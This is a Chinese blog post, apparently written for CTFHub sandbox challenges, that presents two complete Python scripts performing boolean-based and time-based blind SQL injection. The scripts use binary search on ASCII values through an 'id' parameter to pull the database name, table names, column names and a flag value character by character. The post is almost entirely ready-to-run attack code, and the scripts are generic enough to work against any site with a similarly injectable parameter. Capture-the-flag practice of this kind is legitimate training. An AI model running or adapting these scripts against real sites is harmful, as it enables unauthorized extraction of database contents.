zoukankan      html  css  js  c++  java
  • sql布尔盲注和时间盲注的二分脚本

    布尔盲注:

    import requests
    
    url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"
    
    def inject_database(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)"%(i,mid)
    			params = {'id':payload}
    			r = requests.get(url,params = params)
    			if "query_success" in r.text:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def inject_table(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)"%(i,mid)
    			params = {'id':payload}
    			r = requests.get(url,params = params)
    			if "query_success" in r.text:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def inject_column(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)"%(i,mid)
    			params = {'id':payload}
    			r = requests.get(url,params = params)
    			if "query_success" in r.text:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def flag(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)"%(i,mid)
    			params = {'id':payload}
    			r = requests.get(url,params = params)
    			if "query_success" in r.text:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    # inject_database(url)
    # inject_table(url)
    # inject_column(url)
    flag(url)
    

    时间盲注:

    import requests
    import time
    
    #   time.time()
    
    url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"
    
    def inject_database(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)"%(i,mid)
    			params = {'id':payload}
    			start_time = time.time()	#	注入前的系统时间
    			r = requests.get(url,params = params)
    			end_time = time.time()		# 	注入后的时间
    			if end_time - start_time > 1:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def inject_table(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)"%(i,mid)
    			params = {'id':payload}
    			start_time = time.time()	#	注入前的系统时间
    			r = requests.get(url,params = params)
    			end_time = time.time()		# 	注入后的时间
    			if end_time - start_time > 1:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def inject_column(url):
    	name = ''
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)"%(i,mid)
    			params = {'id':payload}
    			start_time = time.time()	#	注入前的系统时间
    			r = requests.get(url,params = params)
    			end_time = time.time()		# 	注入后的时间
    			if end_time - start_time > 1:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def flag(url):
    	name = ''
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)"%(i,mid)
    			params = {'id':payload}
    			start_time = time.time()	#	注入前的系统时间
    			r = requests.get(url,params = params)
    			end_time = time.time()		# 	注入后的时间
    			if end_time - start_time > 1:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    # inject_database(url)
    # inject_table(url)
    # inject_column(url)
    flag(url)
    
  • 相关阅读:
    一个日期Js文件。 2013年10月12日 星期六 癸巳年九月初八
    【Cocosd2d实例教程二】地图编辑器Tiled的安装使用
    结构体快排qsort()
    Crypto API加密通信流程
    LA 4255 Guess
    hdu1005 Number Sequence(数论)
    c++异常 连续抛出异常
    IMP导入数据 报错 IMP-00058 ORA-01691 IMP-00028
    Groovy/Spock 测试导论
    Groovy 与 DSL
  • 原文地址:https://www.cnblogs.com/lemon629/p/13870659.html
Copyright © 2011-2022 走看看